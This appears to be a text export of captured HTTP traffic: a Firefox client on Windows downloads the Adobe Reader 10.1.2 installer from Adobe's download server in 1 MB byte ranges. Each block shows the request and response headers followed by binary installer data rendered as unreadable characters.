.....yU.. ...:..u....Y...M/A..R.p7.x|F.f....7z9.......,..ui.,?...4.....Y[F~...=$W.....t8.......y...7:...).i...%.....6...-.05.e....a..&b^....D*]....I...jy...s.h.....%.Y.$._.v....F....2...... ...m.D.z.mX.NO..].././.zc..kp.].}@...Z......9..Q..B...y.....(.t?....G.....o........a.[3.%xcG...5...C .>.p...\<..0.\........t......../......c..0......._.r..X.. ...q...$...,?a1..i.CWP......t.x...f...@j..)..k.b..#.WQ.*/.... .....97}.=.q.9.C.ooAc.|...?...B{.l..m....'w.P....?..."[...P... ..'.r....t}.b.@........e..Z.v.y.m.A0s....p5vE2.a<(T.d........a....'Jy.zj.h........sy8..$.,..Q...6......@....W.=4.' (.>] H.:.;.Ug.g.G.....E@....=k."X.R'.R.r..q....-.~...$...p.......E.......K4...#.8\.\........Q ..rK.....Z@.........?.#K....$.u..W....N.6.'...=:....\.K4.@.....z....s&,t..>lr%.F.K...........aa.I...L.;..15NK.....g.n'.Vs...~WS..wn.....Dq_y...E.'..".Y.'l.....{...s((... .4.!E.i=V7................e..T.Q..].V..V..6......72......`....q....W.......r....{(...}I...E<?..*..k.....2@.l."B....|Y........#\.pK...V{d).A$..b ./M.?waq..u..$*CuC_Q..p........P,.@.K....\op...&|......%...;...s.....*.;../.$@..o\......o....#Hib...*A.%..<9X{.0.K......f*...|.[...;....7.%,..{.ldyn...%vV.Bg.9.(...9O...Lt.g..xO.....n.....Q...`|O....FR.>:IX.bV..zkZv'....`D.5.........b......_U.MM.x...6..._.k/..D<lC....!.~p..3.z..S.$3.....x..`W...WH.n....[]"G....U..h..;.....p..?..z.?....5aU.HeJ.c.1T......C....p..z.3A.J.g..j........... ..........s$...U\..Sr.}........v(.P.g.a..)v....).g.9..v .hO...3]n..(.....'....I.:j&n.I..i...p.ew0._c.x..\..3E..O:.......KV~...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=38797312-39845887
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:19 GMT
Content-Range: bytes 38797312-39845887/53784984
Content-Length: 1048576
Connection: keep-alive
.....jO..!...H.......R.....Id.>...D.[...d.l^...........X.!if..f.T......nr.../...IV........C..... .c.1X.....A?.....h.@...G..F.,.XC...%....#.....fU....og.....4...w...6re...K.k..8.c;s.....T..C..|.;#<#G..2..9.)...h.<..D. J.8................`..J..N....1Kp.....>Yhr.j.I.|..X..b.`(.(..].... .;...5.g..LHu..3..-......7.....P...I.Qq..nBa....... .......!@.(.K.P.k...'k....4.V.j..W..mx...E.i..~?..l.6..Mg^......dz{.E.H....8.I......`.....F..K......b.R...T.....V.X...}..7.=w.5Y.'...(2.R...R...?OpiE.@tmdF.X...&.t..Y.[.G..._...>'..:...P..~^......7V=(.X....b..C7.o/..=.L.P...]....j..F..|'.....:^.......V;p...E.}cZ6...B.o..E/....$...<...R..ro.Q.4.d...{O.....].a......~...8fP...i.P..B.7~1qN./1.s6..t....`$....:X.B...Oyyn.@.A.....P....... .@.......A$.r.C. R.'.....x\1......$.S..Z...>........Aj.&....J..I..4...[....:..v.....(...(.X.n..E.b.0N..;...BDO.Dv...>4.t....$.].S..W..}..4........~..]./H. ..j{L@...c5.|.kx.........".>....]!P.k~..d...>.nK...h...Vw....%..65.sv.e......@..`|~.....-..f.!..b.u(. 3..9..J....v..-.a|.O............d.E. sJi......_U.[e.......x...~..$Gwa..K.x.l<s%.m...p..Z..........!C...[.......P..N......_..Y....u...E.5YA....?.H..[.2.........T...z....G.#...H>K.#A_.r.5..sm:..fjP...s!h(.5ab..?.L....R.U....MF.Z..:h...X7~..........MAd..RP\..8.6..........R.d.....i.X./.$Q.....u.....h...v|#7.'*sV....b. ..#..7.?..!..'829.T...g.R...>....B.3..[...,C.X..s.sy.....h..I..t....@.a....&....ng. ls.]J.........,x..d....X.C2V?.F. 2..d .7R.L. W ...2........J..Y.1..q.o.M..u.].u..a...A......Jn2m....*....v.w.E..U.=....
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=39845888-40894463
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:20 GMT
Content-Range: bytes 39845888-40894463/53784984
Content-Length: 1048576
Connection: keep-alive
O#*~...S......b..5?.(.=Ic>.G..&._..Ik{f...M...8...].G5....'o...3.d.O..........k<.4.._..v.J.w......P0........ifZ1.{...1.f@.].6......A......id......_.......m.P2/........ ..[..3..F....5..XQ.D.P.4-...a.V..Q ....2"p..x.......l...g.vf.H~4..:...Qf..LK.n...kd.>I|.~.U.....I......r...$........t...@.d@...~.!....d.w..,...m.... ..9..x........^I..[9.....]..J.....rq. x.Q....>.%..m1v.n.Sd.....$.Y.=l4bn...K.X&......P............/2".D.....WB....%:/W..".F29.nF. ..aR..C;.2....VA......ug!.. ..6.....7=k.]...0...I....29,.3..Cw.....[..G..(.......s$.......v..........6.......r......}...^...~R-g.A.5}w.jl..>RG...UG..s..(.!o......z ..O2...7..tr.9.q...-8...._r7.f^.B...).(..)...N...x.....]..L.x".*..B.U....P....h|(...Q...5..]&^...IM..u.c.........8..."..~G...Q.n.JC..A.$H.u...Y.N...^..T[.R...$\..x...D.g........L.|.:.4w.7..R.X......Y.....'.S#?ht.h..K.yn.......8{%.J{..,.Y?.....G.....B.a......f....r.....L.....e8.N..6..........S..x.P.]...?.5..j....#.......UN.x..v....T(.r...eu.8.i..F..(.e.LG.5Vp.......0.b3.zE9............n.H...|.........C|I..Cn..}...>......4...GW.......g.z\.[Q.uF\.O.(..v.Y.S........2Q...2........o...;.....A...x.C.-...DQ=RF/P..(1(J`...?.l......B0.x.(........{,.n78...`BKyg.R.)...k...^.......2..M]%@n.R.l.TA@U..tH.I.Q.....6....E^0.|.L..u5q<..t...;.K....".Y$..18.....4.........e..*....zy..H..)._ .0.R....]. ....n.._<q..K...0...!....V........Q.8!....S..H.S.Cc...C....H.D......m..=>w.....p&.0...h6..p,.(|C..#E.?4........"...}.....=kjC7.......M.$.G33...,..D..........v...&3......5*.)..W...8-K.\i...xb...~......h,.......
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=40894464-41943039
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:20 GMT
Content-Range: bytes 40894464-41943039/53784984
Content-Length: 1048576
Connection: keep-alive
....4..(d.J.Y{..L3.Y.ot..f.O..P{.c..QZNwp.r.Gc.>g.....@.G@o.4.0Iu"....3.B...l!...61.5N..@..~....>......L.%.0..m[W5.K5...]... g....{..a..........`./6z.^..:...G@.I.x..q..Byr...I..:..Q|.._y:q................Q=.i..&.....hC.w...u........0.....y.M...s"p....s.B5u)g..t5&5c...q...w.....%..*.%..[..@....)R..y.)oci.g..QW....#E.....8.y.:...z..I.P...=..t....G{.a..5xD.&....= .I....Qi........G.....2.mA.Hq./.a...Pe.'..a.....k.i..M.B.S...X..x.q..p %c~B......-......p.W......K.V..3`.u.@.tX-7.....{{m.d$Ak.|d........k.. .^Cp.."...0.&..7..bV..JV..^.......O...N....J..0O.e..yD.8...V..@7..B..:l.S..v^.....zK.i[..:G...5..E.(...e[.A.@.....R.}.......<am3E<I...6P..y.<.t.a..x*.j..9*../4..^.j.h..q.....n.'.U..%.6E....6G!8'...O;m......3.....k?......O|..W..#..7........].w&:.(..0X........i.'.....0...."p....}7....($.s..V..d.......&?A....Zj...^.}8...1.7c....O..\)..dr..".R.`..LK..3...W8.b..h..!rC.lI./...f...29.1.....,o...i..H.......o...t.YrN.../...?....Tc..7...Jh?...hQ.lu..H.........0.....QYF...:.G....... ....^.G...@.......&.|....p..Y>..C.P..F....z...9`(.t......4..........9...(..V.......x.q;.2B...Ez....D.... ...O.....-.L.[q......... x..?..A.......;Cb..e...v0..../...0{......8.o.Bfq?..1B.Z..P....Rt.........(Y.............D.x....[....................=.. .`5...i.....n.E.....*.j-l...2....z0l...7O........U3..KS.) .ys..9%..Wx.Z......... 5.......6..... ...D...e..r.)......f....>..`.!B...AT.NWGf...T...c;p.}.J......97....l.Pa*^w'!....-..s c.s...k.:.|/r*.......!6..4...2....^.Owlz..7.r.....u..qS...A....{.$d.^...m)f.!o.5..j.fp..6...9m.J.61...M
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=41943040-42991615
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:20 GMT
Content-Range: bytes 41943040-42991615/53784984
Content-Length: 1048576
Connection: keep-alive
.......}..>.1.l.....l\..G.0?.=......!J*..b.5.4.-..L....J...J..hT..:YC\%RfCI..p..A..md..f....6..[..^.Zor....s;o.p..s..N*a;..Z...C?.'.O.... ...u `Dx O..Q...id.f'`._........U...5...]....u..w.3.._.M.....T.&..-ls..S].m;....kB...|m.Y...hl-.....b..CF1...2..;.*Q......4E..q....Q1.f..#....k........@......|.W0...'...t.!.q.;...[N].....XQ.Z.G..Qio.|...[.1H...?O...nR....".v=yW)^.EZ...6...$.....;41o....z....W...x.>."..........r.=T..A>...%#GV.1....>j....rnI_.:C...T:..fh..)b...B...*.t.....j... .~............e..MgRzHW.D#...m....8..xl..}!#.q.....@##...i.a.t.06^.&-...*'v....YH.N.. 1.=F.M.....)..d...l%....uduspNj...........B/.If*2G........=.....[.KV...s5._o.HyP..`..<-V.p.NI....{b...p.....L....0./...V......f.4ID../.;!...x(pV...f.....?zK.....hG...W.....g..[.8......F.....J...Vn...#3...S.6V..A.OcY...N.).....V.@.Y".w.RZ...P.UU....~......v.g.....Z...>$ .......q=.Y6]..Y...W.!...<LyF..~...YE..K~R...~F ..../....c.f....Lyfz..i....,*.6.....h.~P...e.J....4.....[)......m.....`.~..:...}>.H.q.-3..&Qh...Us.......5/..p..M8'..35|...E.V.\6=...;(....i#xX..9H;R.0...pH...{.q.f....H.M.u).|.e.......a...#..svJ.u...K.....d..F\..$W.`I.#...]1........@*.._t#.....z..r..7....\V5....{....<fF...4.'o.... (...y.%i......(.g..9...W...UM4...q.#t.E...(.....H....qWOe..C.T..C....%....9d..(....P..pz.........=HT=...4...J.}....R..J.r.Q..A. .b*.......o.r......F.!6....`...........?..M@o...c..mt.R..[.R.w.1^....I.%R..U.\;7..8...w......D\.....>.l...e._.?.e...:..W.X.t.$a..cX...%....2G.{..$.....m.._.I...{......{..I...r.*S...Y.4...}........nH....Rv.@..^
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=42991616-44040191
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:21 GMT
Content-Range: bytes 42991616-44040191/53784984
Content-Length: 1048576
Connection: keep-alive
xM.1#..`.Z...G...f:......N..X75...I....8..{....U..:..C3..vj.../.E.h....@x.Vr....`;@e}Q..Q..hQ|.N.......1Y.Y...@......$.i.Z...t...)....."..vQ..c...B.~.. $.Q.}q:..6...%......>x.,V..U..u.x........M...z..uy.}.5.....~.5..!.....0{7m...M.t...m.0&boHP,....b.b.....`.Ig.v4?..#.T..b........'....M.....L.i.hV.q.. s...rw0.T.f`...6.....P.)....2..Pd. ..3.....:.ty...WZ..x....?AiF?.;. ........e#.x|...z.o<....h..D.ZI...c........O......o....w........>.QO.K....%#.....:*&.V...A<.k. ..#}.}....A...$D...q`............%.Y..e.vQ6.6R.w1...pH...f.`........?y...s.c(a.8.......m...(_&..A_...|.I........Js..QT.6....~...Z...AA.|....K$................E.....`.as.........0....T....S`aZ.....W.h..yaN..w*..b3P.Z.xxq....)O....}G.{,.d.*s$./.Dco#33...?n...J...Z}.*p.M.E..e...E4S`...m.{..........B.2...v.Z.......8......fB...pS.~?../ "..N.....\..u.X.....}....W...L.....U.n........-l#.]l.j.._......?V...K.^..h$..j.f.}..<Y.3....t...B."Q%,.w..;.X...6.....3;..hF.v{.Bm.jI..4r..8G.I.....%b..L..U.W.."..3.[..>-..J...7.>K.*.pF..'.t.... ...h..h>...`.H?(mf....{9..X}.... *...&V.....z...,........<.........g.hT2.[..;.G.9P.G.L.,wV.[..w.R~.^.{.yC.N .BkA.{.OU.k....\....................IL.E.E.I.L..@Rh..>TM.... .l%.>D.|..mO..M..<..=.z..&......$s..Y.......u.l..E...Z^.Q..w.G. .-pT......h$...H@...9..@.>9N..4.Yv...;D..j!N........"_......7...h..jN..NhC.....,.a.E.Kdy<w1.m.......vM.y......g.y.T.X.....L.J.)...\4L..YAQ.:k.........;..Z.G.$.K...[|...........42... .6..zZ..]....w.......)..W7...j..:...w.*(P..s.s.d.r....b8Za..K....P..Q...X....>..7a*
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=44040192-45088767
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:22 GMT
Content-Range: bytes 44040192-45088767/53784984
Content-Length: 1048576
Connection: keep-alive
.BA..6..W.........#3.n.<p./.z..........Aw.?.PL..R.......vz...... DL.%b..d..$....i.Q....N.L..su...v.3&"4...h ....~...'..P..C^.......[.c. l6...f>d.tP.....(6cf.=..0V......1e..&......J.G.....K.....?.E.%.:rB..530..X......_..za[.\V..vxV.......o_...q.(0SNsO&....b.Y.^]m6..Z.6....6......(.* ....C..m..5...>.Z.\5B....X3-9.p.N...,...._j..4eE.....g./.x...:a.Z1....c..s<..E~..(hJ}.S..H>~....{R.... Rw.4...r.6.K..$..........1.MUE...^ ?..R.H...n.6...x.....d$2}Y..N.....e.j.y....#Z. ...9.....~.....Jw..x.5Ko....).&iE.9J)...wJ...H.5.W.....4.....I.q_......d....1 Qy.L0$L.3!FCS.... .Y..t ;.....^...Z%".,!..KdNQca.jK#^s.8....Gb. .._....ax...i....$.?.".ft.....E.e.)q...E..z..i.0.....5.6.D?.....%.$wQ.V.M.....&..|.k]...^_ ./k.173......t..I..P......s.. ..../.u.....9.......,..........#...Z.&...X.6.@.f..=.Z^..O........{ ..9....p........ct%sV..1...&0.@.......8..Y.Gi...].j.2.L..|.<...4.I:t.....}L8..,..J.&WO........`.o...I0.../........'&..n...KV.Y..J_M.}.U.B.}>g......~.=F.......?..7N...y|...M.._.w......8GnD...9b.c.v .F..;.%?..C.F"<...0........Z.1.i[..-....v}..B......<=...|..(...2....S. .U1. .....W,...o_5.Gs'<..2^:G..lp2....n ES.C.D.. <~.:.]..Vx.5/..2.M...spWMvo.s^.......L.u.\(...Q=5\.t..!N~I..L.....z..._./.4Q....].s......].u... .H....r..=*...~.&..E..H....Q.X..6..V.I.C....M..I.8 |5"...d.:. ...-N..':."....B..2N/7>."~....J..,............b....q....6p......w./.X.........Kt.3-..-..\n.........$...>.v.Q. ......r.......5.hk.P8.yt..S....l..J..t...Z9......d.o.}..../ B.>.a.' ..N....Q<.:R......_.b...".T.....=...0.,.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=45088768-46137343
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:22 GMT
Content-Range: bytes 45088768-46137343/53784984
Content-Length: 1048576
Connection: keep-alive
d.:p..........S".B`..iS;...h ...w ).......UA..?..]r.L..\.Ml.ud.DL*..&B....Qp.I.....:Pl.U..2..c..z8gf......C.3.......{..R..W.....pA..P..Vk.LX......C...(R.l5..A...^..'y$.^....Tn...?s.H..^.m.1&....D5k.....f..D.......@.J..).{]].O.J..t..p..(*..-....). HX.G2S..NU.K........M...}.y..v.....G\"\.z....C..:@4.......*..8..y.*....%..}..$....F..d3x.....,%zu...^.R..\.?=.]..a..q.k....b..Q....p.v._S...Nh....4.....l....a'..-.mPE\X.V..u..N..!u..~.#.{}....2~.Y O...*.R...?..:.l|Q.......g..x..\..ob..$&L...:Ua..3.......|Fp=3K.F.:.......Y,,.C..9xd|.S...Cdp..F.....z.|WQ`..7...^t.........F.................5.............-..m8..M.YR.. . .;..y#o.f...|.L.!..B..................V00.g..T..MHq!..I~..-..L.!.4...d.......&]..r...0*mN..[JR/...J.\... ..3.d..6..u....S....OYh..t` pYu...%..3...e.....JS.....G?n.j...~9M...E.h...Z...n.......H..q%...!d..1...-.....1,..D.... ...P...1...e.V.6........q&...~.r.[......s.e.........qr....mT}.Mn.....N!9V.~2f.. R..I.z.........n;k.*\("#.7:.....8....'..kB.......--r......t.s...Y.1..U.<...0.~!..h..nX.ED!.7_k[..4..... Hc.....7....p..k.<.A\%D.(.q...^2.....;....6.>.@p.J..$6-..5.$...h...R......>.....%.2.%...$..V...uG....Z;.k.Y\....:nG.Z....Mp.6..{.V...q.A..*...M.]:*:-^.n..El...j.mT.t.#..Y..>..........&.l.7........X1&.PS.#h....pq.....i.5@...4.nK.E.g{..Q.....YB*....5...CIp.....eD.LC...."....C6..>~m{...l.........2s.sH...9....c1.l......1.)....H.:....@iU.]s... .wp.s..[.\...eJ.Q\.}......C@8...a9v.....90..Q...@J.|im...F..Q&pE{|.La...$.t...W..Uq..X.....8..|5.........P../=.....C}..B....I*.... ..wq.u..^&..H3n...z~..
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=46137344-47185919
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:23 GMT
Content-Range: bytes 46137344-47185919/53784984
Content-Length: 1048576
Connection: keep-alive
........c.. .F....vla...]}@.....W....x&0...>m....\.... ........B.../..b@..#.02.F\.s...4.....O.!.....O...).5j.(]...6..ye.7...(X..J.j...l.....x@4R..\1.,k:i9U.....]....7.}$.T.h.~....#...p....Jv.<6..."....y......,.=&?.....f!.5W}....(vgB.Z....g....b..-.c..D4d.K%.X..;...!...C.].....l..[ ....=-..e.J.....o...r9.k..%H.-.!.{....l.UT.VZ..=...pvG...^2..:..X.j!m?..>.......U..25..'..3_..g.O.G......^s..C...............Vg...M.:.b... v.@.$UL.A.1.NT..3.z.i.OC.J.\.......s9{Q...;.......}..S...&.........L......|../m........h.A.0.l...;.........n..li.u...:.k.#Z..q...E!.&....@..Zb..^....oH......>._.*|..koJ../R@....CnV.J...9..&../..{2.......G..2bK._..1c.H9P.w.KEt..._` i..Y0.Co...t]...!^t.h.{b,Vr.9&'iMEfZ..4w\Y..H:.....d../.h.0q...t3..]...@W,k..=Y...V.....A.m..... O...M.P..OB..K..........a.........\~..1.....c4Q...Yr....'.h.."nw....5RX.P.w&1....bdq.....M.TVK..2.K..&....2B...1...~.e...y[.T...._7:..~3".t...(........Z.GH.....3.......#W.e|;f.`..af....6Bo.ur2|.. ..5.o.;;.z.h....[....s..~......\X..N...v..;4......)G..-...Ik..V......4.Y~T.]IFE..J.m.Y...k....q.....I..f.q'.].]F.I.5....y.[..l-.?m.%.).........<]..V...?..T..L.7.......e.V.U........p..'..oz..(..4...JK}.j........._.5h.[. E.!^.TfV.1f......j.5`W.....` ..9.T...z9.........]...d^..$7L 8D5S...OCe.2.=H...N.ax..}o..H*$.h......0L9N$Y.$......F....G..'t.i.c.;..h..(T....[xV....v/...A.#....E...V............TT...B.d\/.p.M0Va...'&.I.....t(...5......EI.b|."...ib!w.....r.."......'.e.i..M..W.Q~.=.UF..&2...{t..0...&. 17....})..*#."...c...K,w......F.(V.........F.#.d.E.p...j.Yw.KGs...dZ..A...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=47185920-48234495
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:23 GMT
Content-Range: bytes 47185920-48234495/53784984
Content-Length: 1048576
Connection: keep-alive
......JV~.......x:.(..O0........Y.^.El..9l.f.......]...%....C.R......WK......<...D-.>q|Aw@l.c'../O.....'D.....'M...?.V.2zo....d..w1..3?.N....(d..fO<7.HZ.r..g.|.j.?.%.^..f.......9R.....OV..A..9....i.....E.Y).C.B.3P.h..-.hj.Q..#....~.Dp}..Y......t.%t....=B.[....f..rC.V.B?.JM...o....E..%...;.....z...z.J..Z..O.(...yLM...C...t...6..y;. ..~.....Y.k.|..f"..Owy......>..n..Z.....#Q......=..&...3..9. 3...1C...G)..F..#] ......i...Qn.B.1........._...}..Q!-...#(.j....,..H|X.i...".n...K.......~...V..0r]JrR.\..C....4...C.o.p..v.....|nD..a]n.*i....lB....Hs0M....l.l.r.D0.<..c.;dPxIB..`.^b.m.?F&....A.Ms..F.XE.......z..ux..`._..F..2.z.l..VVh...T3oQ....H...w...;h.;[...r./.*....(....ZK8<.......CKt...o..q.@@P....N9..Mz.1.':.kT(<.i.p....}.....1.yj.......c'/.....&....G.......b.=..{...V.3......Fpo=.Y.gq................k..xT..=...ayu..0m.[.K....K..N.z.....Z.[U#...C.H.....|.......K.i 6.Y.. t@....M...o..H..Z..j~.1.....0..6#......$uo...F........As.">*./.....1...N.4.a........&.mn.I.D.....y./.W....e.........Q!..yv..p2.Vp.g...n....a.z}Z`@.h.ZB.:`2_....%A.0..]u.RD..>..8m..8.(.......a..../...\....c.N.L'.}a......S.I.a..#...O....~..$...._.....1.z.H.8'.......F...a...2... ......W.k.h#.....9..c.(*....Kw/l ......n.'......s..8!c\..Z"UT(...^K9..G..\...M;.*.Nh.V^a...._...z~.M)'o....a.aO.....>.r...X...$.....(.%.3..E./..^..38......g...C..m...QL.....R......t.1.f.....;....4.^.... ...jK .F.B0.....xM. ...3#........tE(...V- .......@..$....h.......7.SxO..#..=.;.....C8...]...M...^4@...4...<...m&... r[..%T...`9.e.kL.r*..t4........
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=48234496-49283071
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:24 GMT
Content-Range: bytes 48234496-49283071/53784984
Content-Length: 1048576
Connection: keep-alive
.&..H...... 8......1.'1q.T/p....j.].k.w.]...;.`....)....1.....O..V.../..J.%..m..I.6..x&....it6..c .../\.8.....~/>7...z&c1.j........n..vc..(|.F..~.....$.;..F.5.(!.S9.U(....d.......HeD.$.,.....9 ..lhI/..i;?AB.9.j0^\)w.#...J.[....f..P]..|..h:/....a.t...N.4....i.\.^*..aAV^FE......o|v......;..1.y.*.le..\.....}{...c0.&>..(.=WB\D.,......H(j...Z..~....Q. Q_I.*V.!"A.[.i.|....^Z. ..(M..l..<.........3G....v....j^.............. yA.re....N.C....R4@"{.....U.n....S...0.x.(k.o.}.PqEU.....W.H9Z.\..Q.X. .n......l.........N..e2......A/|.0....!..V.7..........p.u.\.. .35...VR...R...w'...H.89..K........T_...h....xur........8..$".....JL..9..%O{P....B..&..~..H...M..g.`.....i.N..5..,...c...^B."....~ ].YD.M3 .s...........!M..N..$I.e.Bn.L.x..,.?.....=..K.?I....F...6.........\$.1Kn..`.....yp..@..ZL.... .3..6.n.....V...c.0.x.....W.[......'7....D..,..^oz^...X.G<.p1.b.......Y.......Cy....43.5...4Y......._l....n\.'..N..9...9c.2...lWX.c...l .m.gT]..`..F....@./2...Eo.9....&m$A.r...s......j.z..R5.@.D.-.|...4e..M..H4 .#o..y..uct.(...I..p....!..h..{.....H..N.g8.....*.....J.^|.M.K.b.........r..#60...9....,.B.U.z.t.^&..../;T.q.z..d>@.q.........a.._..<.5D...s.U .K.X..T..Z..PX.q!....F].b.vr.M........T..Q...p.>..0.-..b.f.......y.8..b?.....:i7 ..L..'.w.Y.&3.-...eK...kR...#.gX4.*[d?)HA...y,.4.aS..Y..[.g.;n.H...f....6...=;j{....IM...W.i.JB.!g>...eW.....TQ<HD8..y.*......`..3....X.SuZ~_...$5.L9`...O..D...*.Yf...FD....Q..JK......!...(.W ..........,...:......l.x...=.}.|....S#..O5F......N....p.. g......m...._&....#....a...=`.....D.4
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=49283072-50331647
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:24 GMT
Content-Range: bytes 49283072-50331647/53784984
Content-Length: 1048576
Connection: keep-alive
